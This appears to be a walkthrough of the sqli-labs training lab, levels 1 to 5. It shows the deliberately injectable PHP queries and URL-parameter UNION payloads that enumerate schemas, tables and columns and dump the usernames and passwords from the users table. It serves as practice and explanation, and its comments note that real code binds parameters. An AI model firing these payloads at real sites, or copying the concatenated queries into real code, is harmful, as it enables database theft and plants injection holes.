# less-1 GET - Error based - Single quotes - String (基于错误的 GET 单引号字符型注入)
字符型单引号闭合
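// Less-1: $id is taken straight from the request and interpolated inside a
// single-quoted literal, so a quote in the input breaks out of the string.
// This is the deliberately vulnerable lab query; in real code the value must
// be bound as a parameter of a prepared statement, never concatenated.
$sql = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";

# `--+` is `-- ` once the URL is decoded (MySQL needs the space after `--`);
# a negative id makes the original SELECT return no row, so only the UNION row
# is rendered.
#
# Confirm the injection point (an unbalanced quote breaks the query):
#   ?id=1'
# Find the column count (the UNION must match the 3 columns of users):
#   ?id=-1' union select 1,2,3--+
# Current database and every schema name:
#   ?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
# Tables of the security schema - read information_schema.tables, not .columns,
# otherwise every table name is repeated once per column:
#   ?id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'--+
# Columns of users (id, username, password):
#   ?id=-1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
# Dump the credentials:
#   ?id=-1' union select 1,group_concat(username),group_concat(password) from security.users --+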
# less-2 GET - Error based - Integer based (基于错误的 GET 整型注入)
数字型
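// Less-2: $id is dropped into the query unquoted (numeric context), so the
// payload needs no quote or closing delimiter - it starts right after the
// number. It is still SQL built from user input; bind the value in real code.
$sql = "SELECT * FROM users WHERE id=$id LIMIT 0,1";

# `--+` is `-- ` once the URL is decoded (MySQL needs the space after `--`);
# a negative id makes the original SELECT return no row, so only the UNION row
# is rendered.
#
# Injection point (the value is used unquoted):
#   ?id=1
# Find the column count (the UNION must match the 3 columns of users):
#   ?id=-1 union select 1,2,3--+
# Current database and every schema name:
#   ?id=-1 union select 1,database(),group_concat(schema_name) from information_schema.schemata--+
# Tables of the security schema - read information_schema.tables, not .columns,
# otherwise every table name is repeated once per column:
#   ?id=-1 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'--+
# Columns of users (id, username, password):
#   ?id=-1 union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
# Dump the credentials:
#   ?id=-1 union select 1,group_concat(username),group_concat(password) from security.users --+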
# less-3 GET - Error based - Single quotes with twist string (基于错误的 GET 单引号变形字符型注入)
// Less-3: the single-quoted value is additionally wrapped in parentheses, so a
// payload has to close both delimiters before its own SQL: ')
$sql = "SELECT * FROM users WHERE id=('" . $id . "') LIMIT 0,1";
# Close the quote and the parenthesis, then UNION (`--+` decodes to `-- `):
#   ?id=-1') union select 1,2,3 --+
# less-4 GET - Error based - Double Quotes - String (基于错误的 GET 双引号字符型注入)
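// Less-4: the request value is wrapped in double quotes by the application and
// then placed inside parentheses, so the payload must close both: ")
// ($GET / the missing semicolon in the transcription were typos - the lab reads
// the superglobal $_GET.)
$id = $_GET['id'];
$id = '"' . $id . '"';
$sql = "SELECT * FROM users WHERE id=($id) LIMIT 0,1";
# Close the double quote and the parenthesis, then UNION (`--+` decodes to `-- `):
#   ?id=-1") union select 1,2,3 --+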
# less-5 GET - Double Injection - Single Quotes - String (双注入 GET 单引号字符型注入)
// Less-5: the same single-quote closing as Less-1, but the page does not echo
// the selected row - only whether the query succeeded or failed differs, so
// data cannot be read back through a UNION column.
// NOTE(review): the lab title "Double Injection" points at error-based
// extraction via a second (sub)query; if the page also prints the MySQL error
// text, that path is available on top of true/false probing - confirm against
// the lab output.
$sql = "SELECT * FROM users WHERE id='" . $id . "' LIMIT 0,1";